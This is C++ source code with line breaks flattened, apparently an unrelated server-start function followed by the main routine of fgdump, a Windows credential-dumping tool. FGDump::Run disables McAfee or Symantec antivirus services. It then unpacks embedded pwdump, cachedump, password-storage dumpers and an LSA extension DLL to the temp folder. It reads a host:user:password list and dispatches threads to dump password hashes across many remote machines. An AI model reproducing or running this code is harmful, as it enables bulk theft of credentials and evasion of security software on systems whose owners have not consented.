bool CWRequest::StartServer(string sServerPath, int iTimeoutMS, string* pSessionID, string* pErrorMessage) { if(sServerPath == "") { if(pErrorMessage != NULL) *pErrorMessage = "Server application not specified."; return false; } if(!FileExists(sServerPath)) { if(pErrorMessage != NULL) *pErrorMessage = "Server application not found."; return false; } // create session ID string session_id = CreateSessionID(); // start server string args = "-s " + session_id; if(!Execute(sServerPath, args, 0, pErrorMessage)) return false; if(!IsServerRunning(session_id, iTimeoutMS, pErrorMessage)) return false; *pSessionID = session_id; return true; }
int FGDump::Run() { ResourceLoader objResPWDump, objResPWService, objResLSAExt, objResFGExec; ResourceLoader objLSADump, objResCacheDump, objResPStgDump; ResourceLoader objResPWService64, objResLSAExt64, objResCacheDump64; size_t nLen; FILE* fileInput = NULL; char szPwdTemp[101]; char COLON[] = ":"; char* szSessionID = NULL; char* szFailedLogName = NULL; char* szDefaultLogName = NULL; GetTempPath(MAX_PATH, lpszTempPath); //Log.ReportError(DEBUG, "Using a temp path of %s\n", lpszTempPath); if (((lpszServer != NULL || *lpszSourceFile != NULL) && lpszUser == NULL) && !bUsePerHostCreds) { Log.ReportError(CRITICAL, "ERROR: you must specify a server and username!\n"); ExitApp(1); } if (lpszServer == NULL && *lpszSourceFile == NULL) { // Local pwdump run bRunLocal = true; lpszServer = "127.0.0.1"; } if (lpszSourceFile == NULL && bUsePerHostCreds) { Log.ReportError(CRITICAL, "ERROR: you must specify a filename to use!\n"); ExitApp(1); } if (!bRunLocal && lpszPassword == NULL && !bUsePerHostCreds) { // Prompt the user for a password memset(szPwdTemp, 0, 101); printf("Please specify the password to use: "); int i = 0; char pwBuf[100]; char c = 0; memset(pwBuf, 0, 100); while(c != '\r' && i < 100) { c = _getch(); pwBuf[i++] = c; _putch('*'); } pwBuf[--i] = 0; _putch('\r'); _putch('\n'); memcpy(szPwdTemp, pwBuf, 100); SetPassword(szPwdTemp); } if ((bRunCachedump == false && bRunPwdump == false) && bFullRun == true) { Log.ReportError(CRITICAL, "ERROR: You cannot specify -c *and* -w, unless you use -t\n"); ExitApp(1); } // Ready to run, grab a session ID szSessionID = CreateSessionID(); if (szSessionID == NULL) { Log.ReportError(CRITICAL, "ERROR: Could not get a session ID. This is very odd...I'd better quit.\n"); ExitApp(1); } size_t nFailedLogNameLength = strlen(szSessionID) + strlen(FAILED_FILE_EXT) + 1; szFailedLogName = (char*)malloc(nFailedLogNameLength); memset(szFailedLogName, 0, nFailedLogNameLength); strncpy(szFailedLogName, szSessionID, strlen(szSessionID)); strncat(szFailedLogName, FAILED_FILE_EXT, strlen(FAILED_FILE_EXT)); LogFailed.SetLogFile(szFailedLogName); // If we haven't overwritten the log file path, set up the default if (strlen(Log.GetLogFile()) == 0) { size_t nLogNameLength = strlen(szSessionID) + strlen(DEFAULT_LOG_FILE_EXT) + 1; szDefaultLogName = (char*)malloc(nLogNameLength); memset(szDefaultLogName, 0, nLogNameLength); strncpy(szDefaultLogName, szSessionID, strlen(szSessionID)); strncat(szDefaultLogName, DEFAULT_LOG_FILE_EXT, strlen(DEFAULT_LOG_FILE_EXT)); Log.SetLogFile(szDefaultLogName); } Log.SetWriteToFile(true); Log.ReportError(REGULAR_OUTPUT, "--- Session ID: %s ---\n", szSessionID); // Get the temporary directory for use in unpacking the files memset(lpszPWServicePath, 0, MAX_PATH + 15); memset(lpszPWDumpPath, 0, MAX_PATH + 15); memset(lpszLSAExtPath, 0, MAX_PATH + 15); memset(lpszFGExecPath, 0, MAX_PATH + 15); memset(lpszCacheDumpPath, 0, MAX_PATH + 15); memset(lpszPStoragePath, 0, MAX_PATH + 15); memset(lpszPWService64Path, 0, MAX_PATH + 15); memset(lpszLSAExt64Path, 0, MAX_PATH + 15); memset(lpszCacheDump64Path, 0, MAX_PATH + 15); _snprintf(lpszPWServicePath, MAX_PATH + 15, "%s%s", lpszTempPath, "servpw.exe"); _snprintf(lpszPWDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "pwdump.exe"); _snprintf(lpszLSAExtPath, MAX_PATH + 15, "%s%s", lpszTempPath, "lsremora.dll"); _snprintf(lpszFGExecPath, MAX_PATH + 15, "%s%s", lpszTempPath, "fgexec.exe"); _snprintf(lpszCacheDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "cachedump.exe"); _snprintf(lpszPStoragePath, MAX_PATH + 15, "%s%s", lpszTempPath, "pstgdump.exe"); _snprintf(lpszPWService64Path, MAX_PATH + 15, "%s%s", lpszTempPath, "servpw64.exe"); _snprintf(lpszLSAExt64Path, MAX_PATH + 15, "%s%s", lpszTempPath, "lsremora64.dll"); _snprintf(lpszCacheDump64Path, MAX_PATH + 15, "%s%s", lpszTempPath, "cachedump64.exe"); // If antivirus is running locally, turn it off, since it may disrupt the storage // of the worker files locally. Only do this if the user hasn't disabled it. if (!bSkipAVCheck) { if (objMcafee.IsServiceInstalled("127.0.0.1")) { Log.ReportError(INFO, "McAfee detected locally\n"); if (objMcafee.GetServiceState("127.0.0.1") == AV_STARTED) { objMcafee.StopService("127.0.0.1"); bDisabledAV = true; } } else if (objSymantec.IsServiceInstalled("127.0.0.1")) { Log.ReportError(INFO, "Symantec detected locally\n"); if (objSymantec.GetServiceState("127.0.0.1") == AV_STARTED) { objSymantec.StopService("127.0.0.1"); bDisabledAV = true; } } } if (!objResPWDump.UnpackResource(IDR_PWDUMP, lpszPWDumpPath)) ExitApp(1); if (!objResPWService.UnpackResource(IDR_PWSERVICE, lpszPWServicePath)) ExitApp(1); if (!objResLSAExt.UnpackResource(IDR_LSAEXT, lpszLSAExtPath)) ExitApp(1); if (!objResFGExec.UnpackResource(IDR_FGEXEC, lpszFGExecPath)) ExitApp(1); if (!objResCacheDump.UnpackResource(IDR_CACHEDUMP, lpszCacheDumpPath)) ExitApp(1); if (!objResPStgDump.UnpackResource(IDR_PSTGDUMP, lpszPStoragePath)) ExitApp(1); if (!objResPWService64.UnpackResource(IDR_PWSERVICE64, lpszPWService64Path)) ExitApp(1); if (!objResLSAExt64.UnpackResource(IDR_LSAEXT64, lpszLSAExt64Path)) ExitApp(1); if (!objResCacheDump64.UnpackResource(IDR_CACHEDUMP64, lpszCacheDump64Path)) ExitApp(1); // Set up the thread pool CreateThreadPool(); if (strlen(lpszSourceFile) > 0) { // User specified a file containing hosts to run against char szLine[200]; size_t nPos; fileInput = fopen(lpszSourceFile, "r"); if (fileInput == NULL) { Log.ReportError(CRITICAL, "The file %s was not found. Sorry, no potato.\n", lpszSourceFile); ExitApp(-1); } fseek(fileInput, 0, SEEK_SET); // Read in data a line at a time and trim it while (fgets(szLine, 200, fileInput) != NULL) { if ((nPos = strcspn(szLine, "\r\n")) >= 0) { szLine[nPos] = '\0'; } if (strlen(szLine) > 0) { if (lpszServer != NULL) delete [] lpszServer; if (bUsePerHostCreds) { char* szResult; if (lpszPassword != NULL) delete [] lpszPassword; if (lpszUser != NULL) delete [] lpszUser; // The line has to be broken up by ':' characters as host:user:pwd szResult = strtok(szLine, COLON); if (szResult == NULL) { Log.ReportError(CRITICAL, "The line '%s' is not of the correct 'host:user:pwd' format, skipping this entry\n", szLine); continue; } // Host name nLen = strlen(szResult); lpszServer = new char[nLen + 1]; memset(lpszServer, 0, nLen + 1); strncpy(lpszServer, szResult, nLen); szResult = strtok(NULL, COLON); if (szResult == NULL) { Log.ReportError(CRITICAL, "The line '%s' is not of the correct 'host:user:pwd' format, skipping this entry\n", szLine); continue; } // Username nLen = strlen(szResult); lpszUser = new char[nLen + 1]; memset(lpszUser, 0, nLen + 1); strncpy(lpszUser, szResult, nLen); szResult = strtok(NULL, COLON); if (szResult == NULL) { Log.ReportError(CRITICAL, "The line '%s' is not of the correct 'host:user:pwd' format, skipping this entry\n", szLine); continue; } // Password nLen = strlen(szResult); lpszPassword = new char[nLen + 1]; memset(lpszPassword, 0, nLen + 1); strncpy(lpszPassword, szResult, nLen); } else { nLen = strlen(szLine); lpszServer = new char[nLen + 1]; memset(lpszServer, 0, nLen + 1); strncpy(lpszServer, szLine, nLen); } DispatchWorkerThread(lpszServer, lpszUser, lpszPassword); } } // Was there an error or end-of-file? if (!feof(fileInput)) { Log.ReportError(CRITICAL, "Unexpected error reading from the file (error %d)\n", GetLastError()); fclose(fileInput); ExitApp(-1); } fclose(fileInput); } else { DispatchWorkerThread(lpszServer, lpszUser, lpszPassword); } WaitForAllThreadsToFinish(); Log.ReportError(CRITICAL, "\n-----Summary-----\n\n"); Log.ReportError(CRITICAL, "Failed servers:\n"); char* szTemp = arrFailed.GetFirstString(); if (szTemp == NULL) Log.ReportError(CRITICAL, "NONE\n"); else { while (szTemp != NULL) { Log.ReportError(CRITICAL, "%s\n", szTemp); szTemp = arrFailed.GetNextString(); } } Log.ReportError(CRITICAL, "\nSuccessful servers:\n"); szTemp = arrSuccess.GetFirstString(); if (szTemp == NULL) Log.ReportError(CRITICAL, "NONE\n"); else { while (szTemp != NULL) { Log.ReportError(CRITICAL, "%s\n", szTemp); szTemp = arrSuccess.GetNextString(); } } if (pThreadData != NULL) delete [] pThreadData; if (bDisabledAV) { // Turn it back on if (objMcafee.IsServiceInstalled("127.0.0.1")) { if (objMcafee.GetServiceState("127.0.0.1") == AV_STOPPED) { objMcafee.StartService("127.0.0.1"); bDisabledAV = false; } } else if (objSymantec.IsServiceInstalled("127.0.0.1")) { if (objSymantec.GetServiceState("127.0.0.1") == AV_STOPPED) { objSymantec.StartService("127.0.0.1"); bDisabledAV = false; } } } Log.ReportError(CRITICAL, "\nTotal failed: %d\n", nFailures); Log.ReportError(CRITICAL, "Total successful: %d\n", nSuccesses); if (szSessionID != NULL) { free(szSessionID); szSessionID = NULL; } if (szFailedLogName != NULL) { free(szFailedLogName); szFailedLogName = NULL; } if (szDefaultLogName != NULL) { free(szDefaultLogName); szDefaultLogName = NULL; } return 0; }